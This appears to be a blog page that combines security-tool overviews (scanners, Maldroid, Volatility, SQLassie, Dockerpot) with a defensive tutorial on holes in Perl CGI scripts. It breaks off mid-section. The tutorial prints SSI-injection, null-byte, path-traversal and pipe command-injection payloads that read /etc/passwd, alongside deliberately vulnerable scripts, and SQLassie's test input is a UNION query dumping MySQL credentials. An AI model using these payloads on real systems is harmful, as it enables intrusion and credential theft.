Never Ending Security

It starts all here


Vulnerability Scanners Simply Explained

What Is a Vulnerability Scanner?

According to Wikipedia, “A vulnerability scanner is a computer program designed to assess computers, computer systems, networks or applications for weaknesses.”
In my own words, “A vulnerability scanner is a program designed to identify the mistakes in a system.”

How Does a Vulnerability Scanner Work?

A vulnerability scanner works much like an antivirus program. It first gathers basic information about the host (the target), such as the operating system and its version, open ports, and running services, and then selects the appropriate test modules.
These scanners rely on a large database of known vulnerabilities, which must be updated continuously. Scheduled scans with an up-to-date scanner help keep a network or system in good security health.
Vulnerability scanners do not only detect vulnerabilities; some also suggest a fix and, in some cases, apply it.
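
The workflow above (gather host information, then match it against a database of known problems) can be sketched in a few lines of Python. This is only a toy model: the service names, versions, advisory identifiers, and the VULN_DB list are all invented for the example, and real scanners use far richer checks than an exact version match.

```python
# Toy illustration only: the services, versions and advisories below are
# invented for this example and do not come from any real scanner.
from dataclasses import dataclass


@dataclass(frozen=True)
class VulnEntry:
    service: str           # service name as reported by the host
    affected_version: str  # exact version string considered vulnerable
    advisory: str          # identifier of the (made-up) advisory


# Hypothetical vulnerability database; a real one is large and updated often.
VULN_DB = [
    VulnEntry("ftpd-example", "1.0", "EXAMPLE-0001"),
    VulnEntry("httpd-example", "2.2", "EXAMPLE-0002"),
]


def scan(host_services):
    """Return (port, advisory) pairs for services that match the database.

    host_services maps a port number to a (service, version) pair, i.e. the
    information a scanner gathers before it selects its tests.
    """
    findings = []
    for port, (service, version) in sorted(host_services.items()):
        for entry in VULN_DB:
            if entry.service == service and entry.affected_version == version:
                findings.append((port, entry.advisory))
    return findings


if __name__ == "__main__":
    discovered = {21: ("ftpd-example", "1.0"), 80: ("httpd-example", "2.4")}
    print(scan(discovered))
```

Only the FTP service is reported here, because the web server version in the example is not listed in the database.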

What Are The Top Vulnerability Scanners?

  • IBM AppScan
  • Netsparker
  • Nessus
  • OpenVAS
  • Retina CS Community
  • CORE Impact Pro
  • Nexpose

What Are The Best Online Vulnerability Scanners?

  • GamaSec
  • Acunetix
  • Websecurify
  • Qualys

5 Vulnerability Scanners

1. OWASP ZAP – Zed Attack Proxy
The Zed Attack Proxy is an easy-to-use integrated penetration testing tool for finding vulnerabilities in web applications. It is designed for security experts as well as for developers and functional testers who are new to penetration testing. ZAP can find vulnerabilities both automatically and through manual testing.
ZAP is available for Windows, Linux, and Mac.
2. Burp Suite
Burp Suite is a collection of tools for web application security testing. It includes a scanner for discovering vulnerabilities automatically and also supports semi-automated penetration testing. Burp Suite helps you work faster and more effectively.
3. OWASP Xenotix XSS Exploit Framework
OWASP Xenotix XSS Exploit Framework is an advanced cross-site scripting (XSS) vulnerability detection and exploitation framework. It aims to provide zero-false-positive scan results with its triple browser engine (Trident, WebKit, and Gecko) embedded scanner.
It is claimed to have the world’s second-largest XSS payload collection, with more than 1,600 distinct payloads for XSS detection and WAF bypass. The Xenotix Scripting Engine lets you create custom test cases and add-ons over the Xenotix API. It also includes a feature-rich information gathering module for target reconnaissance.
The Exploit Framework includes offensive XSS exploitation modules for penetration testing and proof-of-concept creation.
4. Nessus
Nessus is a powerful vulnerability scanner. It started as a free, open-source project, but it has been closed source since Nessus 3 (2005), and the free edition is limited in scope. Its plugins are the vulnerability definitions. It provides lots of features, such as:
  • The client and server can be anywhere on the network.
  • The client and server use SSL to protect scan results.
And lots more!
5. Retina Community
Retina Community gives you vulnerability management across your entire environment.
Free for up to 256 IPs, Retina Community identifies network vulnerabilities (including zero-day), configuration issues, and missing patches across operating systems, applications, devices, and virtual environments.

3 Websites For Vulnerability Research

After doing some research, we have put together a short list of websites that will help you with vulnerability research. Here it is:

1. Security Tracker

Security Tracker provides users with a large database that is updated daily. It is simple to use and effective. Anyone can search the site for the latest vulnerability information, listed under various categories. It is a very good tool for security researchers.

2. Hackerstorm

Hackerstorm provides a vulnerability database tool that lets users get almost all the information about a particular vulnerability. Hackerstorm provides daily updates for free, and the source is available for those who wish to contribute and enhance the tool. Such a large dataset is made possible by its data provider and its contributors.

3. Hackerwatch

Hackerwatch is not a vulnerability database, but it is a useful tool for every security researcher. It is mainly an online community where internet users can report and share information to block and identify security threats and unwanted traffic.

Maldroid – A Simple Framework To Extract Actionable Data From Android Malware (C&Cs, phone numbers etc.)


Simple framework to extract “actionable” data from Android malware (C&Cs, phone numbers etc.)


You have to install the following packages before you start using this project:

  • Androguard (git clone; cd androguard; sudo python install)
  • PyCrypto (easy_install pycrypto)
  • pyelftools (easy_install pyelftools)
  • yara (easy_install yara)


The idea is simple and modular. The project has a couple of directories that hold your static analysis and output processing code:

  • plugins – this is where the code responsible for malware identification and data extraction lives. Every class has to inherit from the Plugin class from templates.
    • The recon method identifies the malware – put there all of the code you need to make sure you can extract the data.
    • The extract method does the actual extraction. There is no specific format for the extracted data, but it’s good to keep it in a Python dictionary, so that the output processors can read it in a uniform way.
  • processing – this is where you put classes that inherit from the OutputProcessor class. They are invoked after the data extraction and receive the extracted info.
    • The process method takes the data and produces some kind of result (e.g. adds a file or C&C to your database, checks if the C&C is live, etc.)
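
To make the plugin/processor split more concrete, here is a minimal, self-contained sketch. The Plugin and OutputProcessor classes below are stand-ins written for this example (the real base classes live in the project's templates and may look different), and ExampleFamily, CollectC2, and analyze are hypothetical names.

```python
# Stand-in base classes: the real ones come from the project's templates;
# these minimal versions are assumptions made for illustration.
class Plugin:
    def __init__(self, sample_bytes):
        self.sample = sample_bytes

    def recon(self):
        raise NotImplementedError

    def extract(self):
        raise NotImplementedError


class OutputProcessor:
    def process(self, data):
        raise NotImplementedError


class ExampleFamily(Plugin):
    """Hypothetical plugin for a made-up family that stores its C&C in clear text."""

    MARKER = b"c2="

    def recon(self):
        # Identify the family: here, simply look for a marker string.
        return self.MARKER in self.sample

    def extract(self):
        # Return a dictionary so output processors can read it uniformly.
        start = self.sample.index(self.MARKER) + len(self.MARKER)
        end = self.sample.find(b"\n", start)
        if end == -1:
            end = len(self.sample)
        return {"malware": "examplefamily", "c2": [self.sample[start:end].decode()]}


class CollectC2(OutputProcessor):
    """Hypothetical processor that just remembers every C&C it is given."""

    def __init__(self):
        self.seen = []

    def process(self, data):
        self.seen.extend(data.get("c2", []))


def analyze(sample_bytes, plugins, processors):
    """Run the first plugin that recognizes the sample, then all processors."""
    for plugin_cls in plugins:
        plugin = plugin_cls(sample_bytes)
        if plugin.recon():
            data = plugin.extract()
            for proc in processors:
                proc.process(data)
            return data
    return None
```

Keeping the extracted data in a plain dictionary is what lets any processor consume the output of any plugin.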

If you want to contribute, write a plugin that decodes some new malware family. It’s easy, just look at the existing plugins.


So, you have an APK sample and you don’t know what it is or where its C&C is? Type:

python [sample_path]

If maldrolyzer knows the malware family it will display some useful information like:

{'c2': [''],
 'malware': 'xbot007',
 'md5': 'ce17e4b04536deac4672b98fbee905e0',
 'sha1': 'a48a2b8a5e1cae168ea42bd271f5b5a0c65f59a9',
 'sha256': 'c3a24d1df11baf2614d7b934afba897ce282f961e2988ac7fa85e270e3b3ea7d',
 'sha512': 'a47f3db765bff9a8d794031632a3cf98bffb3e833f90639b18be7e4642845da2ee106a8947338b9244f50b918a32f1a6a952bb18a1f86f8c176e81c2cb4862b9'}

And you can track the C&Cs from several malware families using


Volatility – An Advanced Open Source Memory Forensics Framework

Quick Start

  • Choose a release – the most recent is Volatility 2.4, released August 2014. Older versions are also available on the Releases page or respective release pages. If you want the cutting edge development build, use a git client and clone the master.
  • Install the code – Volatility is packaged in several formats, including source code in zip or tar archive (all platforms), a Pyinstaller executable (Windows only) and a standalone executable (Windows only). For help deciding which format is best for your needs, and for installation or upgrade instructions, see Installation.
  • Target OS specific setup – the Linux, Mac, and Android support may require accessing symbols and building your own profiles before using Volatility. If you plan to analyze these operating systems, please see Linux, Mac, or Android.
  • Read usage and plugins – command-line parameters, options, and plugins may differ between releases. For the most recent information, see Volatility Usage and Command Reference.
  • Communicate – If you have documentation, patches, ideas, or bug reports, you can communicate them through the github interface, IRC (#volatility on freenode), the Volatility Mailing List or Twitter (@volatility).
  • Develop – For advanced users who want to develop their own plugins, address spaces, and other components of volatility, there is a recommended StyleGuide.
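
As a rough illustration of the command line mentioned above, the sketch below builds a typical Volatility 2.x invocation (image file via -f, a --profile, then the plugin name) and optionally runs it. The file name memory.raw, the location of vol.py, and the assumption that the python command points to an interpreter Volatility 2.x can use are all assumptions; check the usage documentation for your release.

```python
import subprocess


def volatility_command(image_path, profile, plugin, vol_script="vol.py"):
    """Build the argument list for one Volatility 2.x plugin run."""
    return ["python", vol_script, "-f", image_path, "--profile=" + profile, plugin]


def run_plugin(image_path, profile, plugin):
    # Needs a local Volatility 2.x checkout; returns the plugin's text output.
    cmd = volatility_command(image_path, profile, plugin)
    return subprocess.run(cmd, capture_output=True, text=True, check=True).stdout


if __name__ == "__main__":
    # Only prints the command; nothing is executed here.
    print(" ".join(volatility_command("memory.raw", "Win7SP1x64", "pslist")))
```

Passing the arguments as a list avoids any shell quoting problems with unusual image paths.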

Why Volatility

  • A single, cohesive framework analyzes RAM dumps from 32- and 64-bit windows, linux, mac, and android systems. Volatility’s modular design allows it to easily support new operating systems and architectures as they are released. All your devices are targets…so don’t limit your forensic capabilities to just windows computers.

  • It’s open source (GPLv2), which means you can read it, learn from it, and extend it. Why use a tool that outputs results without giving you any indication where the values came from or how they were interpreted? Learn how your tools work, understand why and how to tweak and enhance them – help yourself become a smarter analyst. You can also immediately fix any issues you discover, instead of having to wait weeks or months for vendors to communicate, reproduce, and publish patches.
  • It’s written in Python, an established forensic and reverse engineering language with loads of libraries that can easily integrate into volatility. Most analysts are already familiar with Python and don’t want to learn new languages, such as windbg’s scripting syntax, which is often seen as cryptic and frequently lacks the capabilities you need. Other memory analysis frameworks require you to use Visual Studio to compile C# DLLs, and the rest don’t expose a programming API at all.
  • Runs on windows, linux, or mac analysis systems (anywhere Python runs) – a refreshing break from other memory analysis tools that only run on windows and require .NET installations and admin privileges just to open. If you’re already accustomed to performing forensics on a particular host OS, by all means keep using it – and take volatility with you.
  • Extensible and scriptable API gives you the power to go beyond and continue innovating. For example you can use volatility to build a customized web interface or GUI, drive your malware sandbox, perform virtual machine introspection or just explore kernel memory in an automated fashion. Analysts can add new address spaces, plugins, data structures, and overlays to truly weld the framework to their needs. You can explore the Doxygen documentation for Volatility to get an idea of its internals.
  • Unparalleled feature sets based on reverse engineering and specialized research. Volatility provides capabilities that Microsoft’s own kernel debugger doesn’t allow, such as carving command histories, console input/output buffers, USER objects (GUI memory), and network related data structures. Just because it’s not documented doesn’t mean you can’t analyze it!
  • Comprehensive coverage of file formats – volatility can analyze raw dumps, crash dumps, hibernation files, VMware .vmem, VMware saved state and suspended files (.vmss/.vmsn), VirtualBox core dumps, LiME (Linux Memory Extractor), expert witness (EWF), and direct physical memory over Firewire. You can even convert back and forth between these formats. In the heat of your incident response moment, don’t get caught looking like a fool when someone hands you a format your other tools can’t parse.
  • Fast and efficient algorithms let you analyze RAM dumps from large systems without unnecessary overhead or memory consumption. For example volatility is able to list kernel modules from an 80 GB system in just a few seconds. There is always room for improvement, and timing differs per command, however other memory analysis frameworks can take several hours to do the same thing on much smaller memory dumps.
  • Serious and powerful community of practitioners and researchers who work in the forensics, IR, and malware analysis fields. It brings together contributors from commercial companies, law enforcement, and academic institutions around the world. Don’t just take our word for it – check out the Volatility Documentation Project – a collection of over 200 docs from 60+ different authors. Volatility is also being built on by a number of large organizations such as Google, National DoD Laboratories, DC3, and many Antivirus and security shops.
  • Forensics/IR/malware focus – Volatility was designed by forensics, incident response, and malware experts to focus on the types of tasks these analysts typically perform. As a result, there are things that are often very important to a forensic analyst that are not as important to a person debugging a kernel driver (unallocated storage, indirect artifacts, etc).
  • Money-back guarantee – although volatility is free, we stand by our work. There is nothing another memory analysis framework can do that volatility can’t (or that it can’t be quickly programmed to do).


SQLassie – A database Firewall That Detects And Prevents SQL Injection Attacks At Runtime


SQLassie is a database firewall that detects and prevents SQL injection attacks at runtime.


SQLassie currently only supports MySQL. To start SQLassie, you’ll need to configure how SQLassie connects to the MySQL server, start SQLassie listening on a different port that is now protected, and then configure your applications to connect through this alternate port instead of directly to MySQL.

As an example, consider a scenario where you have a MySQL database engine running and listening for connections on the domain socket /var/run/mysql/mysqld.sock and are running a MediaWiki installation.

First, start SQLassie using

./sqlassie -s /var/run/mysql/mysqld.sock -l 3307

Then, edit MediaWiki’s configuration file LocalSettings.php to connect to port 3307.

$wgDBServer = ""

Note that you can’t use localhost here; by default, MySQL interprets localhost as a request to use the direct database domain socket connection, and most web applications behave this way as well. Therefore, you have to use the explicit string in order to force connections to go through the TCP port. Check your application’s documentation for more information.


Now that you’ve gotten everything up and running, check to see if your web application still loads. If it does, you can check to see if SQLassie is correctly filtering attacks against your database. Bring up a terminal and run

mysql -u <user> -p -h -P 3307 -C

to connect to the database through SQLassie.

We can run a number of tests here. First, SQLassie will block most error messages that are produced by MySQL, because this information can be valuable to hackers. Start by running


Normally, MySQL would respond with an error about no database being selected, but SQLassie intercepts the query and instead responds with Empty set. In this case, SQLassie recognized that the query was a SELECT query, and rather than give an error, it simply provided a response that made sense based on the query type.

Next, try running

SELECT first_name, last_name, age FROM user WHERE id = 1323 UNION SELECT User, Password, 1 FROM mysql.user;

SQLassie identifies this query as containing a schema discovery attack and blocks the query, responding with a fake Empty set message.
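
To get a feel for what “schema discovery” means, here is a deliberately naive Python check that flags a UNION SELECT reading from MySQL’s system schemas. How SQLassie itself detects such queries is not described here; this regular expression is only a stand-in for illustration, and the function name is hypothetical. A pattern like this is easy to bypass and should not be used as a real defense.

```python
import re

# Naive pattern: a UNION [ALL] SELECT that reads from a MySQL system schema.
_SCHEMA_PROBE = re.compile(
    r"\bUNION\b(?:\s+ALL)?\s+SELECT\b.*\bFROM\s+`?(?:mysql|information_schema)`?\s*\.",
    re.IGNORECASE | re.DOTALL,
)


def looks_like_schema_discovery(query):
    """Return True if the query matches the naive schema-probe pattern."""
    return _SCHEMA_PROBE.search(query) is not None


if __name__ == "__main__":
    attack = ("SELECT first_name, last_name, age FROM user WHERE id = 1323 "
              "UNION SELECT User, Password, 1 FROM mysql.user;")
    print(looks_like_schema_discovery(attack))
    print(looks_like_schema_discovery("SELECT first_name FROM user WHERE id = 1323"))
```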


SQLassie comes with two Makefiles: one meant for use with gcc, and one meant for use with clang++. Support for gcc is more thorough at this time, so to start building, change into the source directory

cd src

and link to the gcc Makefile by running

ln -s Makefile.gcc Makefile

Next, you’ll need to install some dependencies. On a Debian-based system, you should get everything you need by running

apt-get install make g++ bison flex libboost-regex-dev libboost-thread-dev libboost-program-options-dev libboost-test-dev libboost-filesystem-dev libmysqlclient-dev

Finally, compile by running


The resulting binaries will be placed in the bin directory.


Dockerpot – A Docker Based Honeypot

Dockerpot is a Docker-based honeypot.


Install the necessary software

$ sudo apt-get update
$ sudo apt-get install socat xinetd auditd

$ # for installing nsenter
$ docker run --rm -v /usr/local/bin:/target jpetazzo/nsenter

Install the honeypot scripts

Copy honeypot to /usr/bin/honeypot and honeypot.clean to /usr/bin/honeypot.clean and make them executable. You may have to customize the ports in the iptables rules, the memory limit of the container and the network quota if you want to run anything other than an SSH honeypot on port 22.

Configure crond, xinetd and auditd


Add the following line to /etc/crontab (entries in this file include a user field, here root). This runs the cleanup script to check for old containers every 5 minutes.

*/5 * * * * root /usr/bin/honeypot.clean


Create the following service file in /etc/xinetd.d/honeypot and add the line honeypot 22/tcp to /etc/services to keep xinetd happy.

# Container launcher for an SSH honeypot
service honeypot
{
        disable         = no
        instances       = UNLIMITED
        server          = /usr/bin/honeypot
        socket_type     = stream
        protocol        = tcp
        port            = 22
        user            = root
        wait            = no
        log_type        = SYSLOG authpriv info
        log_on_success  = HOST PID
        log_on_failure  = HOST
}


Enable logging of the execve system call in auditd by appending the following lines to /etc/audit/audit.rules.

-a exit,always -F arch=b64 -S execve
-a exit,always -F arch=b32 -S execve

Create a base image for the honeypot

Create and configure a base image for the honeypot. The container is run with the command /sbin/init, so place your initialization script there or configure an init system of your choice. Make sure to commit the image as “honeypot:latest”. You should also create an account named user and give it a weak password such as 123456, so that brute-force attackers can crack their way into the honeypot. The IP address of the attacker’s host is passed to the container in the environment variable “REMOTE_HOST”. For logging, you might additionally want to configure an rsyslog instance to forward logs to the host machine.


Avoiding security holes when developing an application – Part 6: CGI scripts

Web server, URI and configuration problems

(Too short) Introduction on how a web server works and how to build a URI

When a client asks for an HTML file, the server sends the requested page (or an error message). The browser interprets the HTML code to format and display the file. For instance, when you type a URL (Uniform Resource Locator) ending in /HOWTO/HOWTO-INDEX/howtos.html, the client connects to the server and asks for the /HOWTO/HOWTO-INDEX/howtos.html page (called the URI, Uniform Resource Identifier), using the HTTP protocol. If the page exists, the server sends the requested file. With this static model, if the file is present on the server, it is sent “as is” to the client; otherwise an error message is sent (the well-known 404 – Not Found).

Unfortunately, this doesn’t allow interactivity with the user, making features such as e-business, e-reservation for holidays or e-whatever impossible.

Fortunately, there are solutions to dynamically generate HTML pages. CGI (Common Gateway Interface) scripts are one of them. In this case, the URI to access web pages is built in a slightly different way :

http://<server><pathToScript>[?[param_1=val_1][...][&param_n=val_n]]
The argument list is stored in the QUERY_STRING environment variable. In this context, a CGI script is nothing but an executable file. It uses stdin (standard input) or the environment variable QUERY_STRING to get the arguments passed to it. After the code runs, the result is written to stdout (standard output) and then redirected to the web client. Almost every programming language can be used to write a CGI script (compiled C program, Perl, shell scripts…).

For example, let’s search what the HOWTOs from know about ssh : scope=0&rpt=20
In fact, this is much simpler than it seems. Let’s analyze this URL:

  • the server is still the same one ;
  • the requested file, the CGI script, is called /cgi-bin/ldpsrch.cgi ;
  • the ? is the beginning of a long list of arguments :
    1. is the server where the request comes from;
    2. srch=ssh contains the request itself;
    3. db=1 means the request only concerns HOWTOs;
    4. scope=0 means the request concerns the document’s content and not only its title;
    5. rpt=20 limits to 20 the number of displayed answers.
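
The breakdown above is exactly what a URL parser does for you. Here is a small Python sketch using the standard urllib.parse module; the host name server.example is a placeholder, and only the parameters spelled out in the list are included.

```python
from urllib.parse import parse_qs, urlsplit


def split_cgi_url(url):
    """Return (script_path, params) for a CGI-style URL."""
    parts = urlsplit(url)
    return parts.path, parse_qs(parts.query)


if __name__ == "__main__":
    # Hypothetical host name; path and parameters follow the example above.
    path, params = split_cgi_url(
        "http://server.example/cgi-bin/ldpsrch.cgi?srch=ssh&db=1&scope=0&rpt=20"
    )
    print(path)
    print(params["srch"], params["rpt"])
```

Note that parse_qs returns a list for every key, since the same parameter may appear several times in a query string.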

Often, arguments names and values are explicit enough to understand their meaning. Furthermore, the content of the page displaying the answers is rather significant.

Now you know that the bright side of CGI scripts is the user’s ability to pass in arguments… but the dark side is that a badly written script opens a security hole.

You probably noticed the strange characters used by your preferred browser or present within the previous request. Those characters are encoded with the ISO 8859-1 charset (have a look at man iso_8859_1). Table 1 gives the meaning of some of these codes. Note that some IIS 4.0 and IIS 5.0 servers have a very dangerous vulnerability, known as the Unicode bug, based on the extended Unicode representation of “/” and “\”.

Apache configuration with SSI (Server Side Include)

Server Side Include is a part of a web server’s functionality. It allows integrating instructions into web pages, either to include a file “as is”, or to execute a command (shell or CGI script).

In the Apache configuration file httpd.conf, the “AddHandler server-parsed .shtml” instruction activates this mechanism. Often, to avoid the distinction between .html and .shtml, the .html extension is added as well. Of course, this slows down the server… This can be controlled at the directory level with the instructions:

  • Options Includes activates every SSI;
  • Options IncludesNoExec prohibits exec cmd and exec cgi.

In the attached guestbook.cgi script, the text provided by the user is included into an HTML file without converting the ‘<’ and ‘>’ characters into the &lt; and &gt; HTML codes. A curious person could submit one of the following instructions:

  • <!--#printenv --> (mind the space after printenv  )
  • <!--#exec cmd="cat /etc/passwd"-->

With the first one, you get a few lines of information about the system:

HTTP_ACCEPT=image/gif, image/jpeg, image/pjpeg, image/png, */*
HTTP_USER_AGENT=Mozilla/4.76 [fr] (X11; U; Linux 2.2.16 i686)
SERVER_SIGNATURE=<ADDRESS>Apache/1.3.14 Server Port 8080</ADDRESS>

SERVER_SOFTWARE=Apache/1.3.14 (Unix)  (Red-Hat/Linux) PHP/3.0.18
DATE_LOCAL=Tuesday, 27-Feb-2001 15:33:56 CET
DATE_GMT=Tuesday, 27-Feb-2001 14:33:56 GMT
LAST_MODIFIED=Tuesday, 27-Feb-2001 15:28:05 CET

The exec instruction gives you almost the equivalent of a shell:


Don’t try “<!--#include file="/etc/passwd"-->”: the path is relative to the directory where the HTML file is found and can’t contain “..”. The Apache error_log file then contains a message indicating an access attempt to a prohibited file. The user sees the message [an error occurred while processing this directive] in the HTML page.

SSI is not often needed, so it is better to deactivate it on the server. However, the real cause of the problem is the combination of the broken guestbook application and SSI.
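
The application-side half of the fix is to convert the HTML metacharacters before the text is written into the page. A minimal Python sketch with the standard html module follows (the function name is made up for the example; the guestbook itself is a Perl script, so this only shows the idea):

```python
import html


def sanitize_guestbook_entry(text):
    """Escape HTML metacharacters so the text is displayed, not interpreted."""
    return html.escape(text, quote=True)


if __name__ == "__main__":
    print(sanitize_guestbook_entry('<!--#exec cmd="cat /etc/passwd"-->'))
```

Once ‘<’ and ‘>’ are replaced by &lt; and &gt;, the server no longer sees an SSI directive in the stored entry, only harmless text.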

Perl Scripts

In this section, we present security holes related to CGI scripts written in Perl. To keep things clear, we don’t provide the examples’ full code but only the parts required to understand where the problem is.

Each of our scripts is built according to the following template:

#!/usr/bin/perl -wT
BEGIN { $ENV{PATH} = '/usr/bin:/bin' }
delete @ENV{qw(IFS CDPATH ENV BASH_ENV)};   # Make %ENV safer =:-)
print "Content-type: text/html\n\n";
print "<HTML>\n<HEAD>";
print "<TITLE>Remote Command</TITLE></HEAD>\n";
# Fill %input with the arguments passed to the script
&ReadParse(\%input);
# now use $input e.g like this:
# print "<p>$input{filename}</p>\n";
# #################################### #
# Start of problem description         #
# #################################### #

# ################################## #
# End of problem description         #
# ################################## #

# Target of the "goto form" used in the examples
form:
print "<form action=\"$ENV{'SCRIPT_NAME'}\">\n";
print "<input type=text name=filename>\n </form>\n";
print "</BODY>\n";
print "</HTML>\n";
exit(0);

# first arg must be a reference to a hash.
# The hash will be filled with data.
sub ReadParse($) {
  my $in=shift;
  my ($i, $key, $val);
  my $in_first;
  my @in_second;

  # Read in text
  if ($ENV{'REQUEST_METHOD'} eq "GET") {
    $in_first = $ENV{'QUERY_STRING'};
  } elsif ($ENV{'REQUEST_METHOD'} eq "POST") {
    read(STDIN,$in_first,$ENV{'CONTENT_LENGTH'});
  } else {
    die "ERROR: unknown request method\n";
  }

  @in_second = split(/&/,$in_first);

  foreach $i (0 .. $#in_second) {
    # Convert plus's to spaces
    $in_second[$i] =~ s/\+/ /g;

    # Split into key and value.
    ($key, $val) = split(/=/,$in_second[$i],2);

    # Convert %XX from hex numbers to alphanumeric
    $key =~ s/%(..)/pack("c",hex($1))/ge;
    $val =~ s/%(..)/pack("c",hex($1))/ge;

    # Associate key and value
    # \0 is the multiple separator
    $$in{$key} .= "\0" if (defined($$in{$key}));
    $$in{$key} .= $val;
  }

  return length($#in_second);
}

More on the arguments passed to Perl (-wT) later. We begin by cleaning up the %ENV hash, including the PATH environment variable, and we send the HTTP header (this is part of the HTTP protocol between browser and server; you can’t see it in the page displayed by the browser). The ReadParse() function reads the arguments passed to the script. This can be done more easily with modules, but this way you can see the whole code. Next come the examples. Last, we finish the HTML file.

The null byte

Perl treats every character the same way, unlike C functions, for instance. For Perl, the null character that ends a C string is a character like any other. So what?

Let’s add the following code to our script to create showhtml.cgi  :

  # showhtml.cgi
  my $filename= $input{filename}.".html";
  print "<BODY>File : $filename<BR>";
  if (-e $filename) {
      open(FILE,"$filename") || goto form;
      print <FILE>;
  }

The ReadParse() function gets the only argument : the name of the file to display. To prevent some “rude guest” from reading more than the HTML files, we add the “.html” extension at the end of the filename. But, remember, the null byte is a character like any other one…

Thus, if our request is showhtml.cgi?filename=%2Fetc%2Fpasswd%00, the file is called my $filename = "/etc/passwd\0.html" and our astounded eyes gaze at something that is not HTML.

What happens ? The strace command shows how Perl opens a file:

  /tmp >>cat > << EOF
  > #!/usr/bin/perl
  > open(FILE, "/etc/passwd\0.html");
  > EOF
  /tmp >>chmod 0700
  /tmp >>strace ./ 2>&1 | grep open
  execve("./", ["./"], [/* 24 vars */]) = 0
  open("./", O_RDONLY)             = 3
  read(3, "#!/usr/bin/perl\n\nopen(FILE, \"/et"..., 4096) = 51
  open("/etc/passwd", O_RDONLY)           = 3

The last open() shown by strace corresponds to the system call, written in C. We can see that the .html extension has disappeared, and this allowed us to open /etc/passwd.

This problem is solved with a single regular expression which removes all null bytes:

s/\0//g;
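
The same clean-up can be sketched in Python to see what actually happens to the value. The function name clean_filename is made up for this example; unquote comes from the standard urllib.parse module.

```python
from urllib.parse import unquote


def clean_filename(raw_value):
    """Decode a query-string value and strip any null bytes from it."""
    decoded = unquote(raw_value)
    return decoded.replace("\x00", "")


if __name__ == "__main__":
    raw = "%2Fetc%2Fpasswd%00"
    # repr() makes the embedded null byte visible.
    print(repr(unquote(raw)))
    print(clean_filename(raw) + ".html")
```

After the null byte is removed, the “.html” suffix is attached to the name again, so the request ends up looking for /etc/passwd.html, as the script intended.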


Using pipes

Here is a script without any protection. It displays a given file from the directory tree /home/httpd/ :


my $filename= "/home/httpd/".$input{filename};
print "<BODY>File : $filename<BR>";
open(FILE,"$filename") || goto form;
print <FILE>;

Don’t laugh at this example ! I have seen such scripts.

The first exploit is obvious :


Going up the tree is enough to access any file. But there is another, much more interesting possibility: executing the command of your choice. In Perl, the open(FILE, "/bin/ls") command opens the “/bin/ls” binary file… but open(FILE, "/bin/ls |") executes the specified command. Adding a single pipe | changes the behavior of open().

Another problem comes from the fact that the existence of the file is not tested, which allows us to execute any command but also to pass any arguments : pipe1.cgi?filename=..%2F..%2F..%2Fbin%2Fcat%20%2fetc%2fpasswd%20| displays the password file content.
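
One common way to block the “go up the tree” part of this attack is to resolve the requested path and check that it still lies under the intended directory. Below is a minimal Python sketch of that idea; the function name is hypothetical and /home/httpd is simply the directory from the example. It does not reproduce Perl’s pipe behavior (Python’s built-in open() never runs a command), so it only illustrates the path check.

```python
import os

BASE_DIR = "/home/httpd"


def resolve_under_base(user_path, base_dir=BASE_DIR):
    """Return the absolute path for user_path, or None if it escapes base_dir."""
    if "\x00" in user_path:
        return None  # never accept embedded null bytes
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, user_path))
    # commonpath() equals base only when candidate is base or lies below it.
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


if __name__ == "__main__":
    print(resolve_under_base("../../../etc/passwd"))
    print(resolve_under_base("../../../bin/cat /etc/passwd |"))
```

Both requests in the usage example are rejected, because after resolution they point outside the base directory.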

Testing the existence of the file to open gives less freedom :


my $filename= "/home/httpd/".$input{filename};
print "<BODY>File : $filename<BR>";
if (-e $filename) {
  open(FILE,"$filename") || goto form;
  print <FILE>;
} else {
  print "-e failed: no file\n";
}

The previous example doesn’t work anymore. The “-e” test fails since it can’t find the “../../../bin/cat /etc/passwd |” file.

Let’s now try the /bin/ls command. The behavior is the same as before. That is, if we try, for instance, to list the /etc directory content, “-e” tests the existence of the “../../../bin/ls /etc |” file, which doesn’t exist either. As long as the name we supply does not match an existing file, we won’t get anything interesting :(

However, there is still a “way out”, even if the result is not as good. The /bin/ls file exists (well, on most systems), but if open() is called with this filename, the command isn’t executed; the binary is displayed instead. We must then find a way to put a pipe ‘|’ at the end of the name without it being seen by the “-e” check. We already know the solution: the null byte. If we send “../../../bin/ls\0|” as the name, the existence check succeeds since it only considers “../../../bin/ls”, but open() can see the pipe and then executes the command. Thus, the URI providing the current directory content is:


Line feed

The finger.cgi script executes the finger instruction on our machine :


print "<BODY>";
$login = $input{'login'};
$login =~ s/([;<>\*\|`&\$!#\(\)\[\]\{\}:'"])/\\$1/g;
print "Login $login<BR>\n";
print "Finger<BR>\n";
$CMD= "/usr/bin/finger $login|";
open(FILE,"$CMD") || goto form;
print <FILE>;

This script takes (at least) one useful precaution: it handles some special characters by placing a ‘\’ in front of them, to prevent the shell from interpreting them. Thus, the semicolon is changed to “\;” by the regular expression. But the list doesn’t contain every important character. Among others, the line feed ‘\n’ is missing.

On your preferred shell command line, you validate an instruction by pressing the RETURN or ENTER key, which sends a ‘\n’ character. In Perl, you can do the same. We already saw that the open() instruction lets us execute a command as soon as the line ends with a pipe ‘|’.

To simulate this behavior, we need to add a line feed and an instruction after the login sent to the finger command:


Other characters are quite interesting to execute various instructions in a row :

  • ;  : it ends the first instruction and goes to the next one;
  • &&  : if the first instruction succeeds (i.e. returns 0 in a shell), then the next one is executed;
  • ||  : if the first instruction fails (i.e. returns a non-zero value in a shell), then the next one is executed.

They don’t work here since they are protected with the regular expression. But, let’s find a way to work this out.
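
Listing the dangerous characters one by one is fragile, as the missing line feed shows. The opposite approach is to accept only characters known to be harmless. Here is a minimal Python sketch of such an allow-list; the permitted character set and the 32-character limit are assumptions chosen for the example, not rules taken from finger.

```python
import re
import subprocess

# First character alphanumeric (so the value cannot look like an option),
# then letters, digits, underscore, dot or dash.
_LOGIN_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9_.-]{0,31}")


def is_safe_login(login):
    """Accept only a short run of harmless characters (an allow-list)."""
    # fullmatch is deliberate: with match() and a trailing "$", a value
    # ending in "\n" would still be accepted.
    return _LOGIN_RE.fullmatch(login) is not None


def finger(login):
    if not is_safe_login(login):
        raise ValueError("rejected login value")
    # Argument list, no shell: the value reaches finger as a single argument.
    return subprocess.run(["/usr/bin/finger", login],
                          capture_output=True, text=True).stdout


if __name__ == "__main__":
    for value in ["kmaster", "kmaster\ncat /etc/passwd", "kmaster;cat"]:
        print(repr(value), is_safe_login(value))
```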

Backslash and semicolon

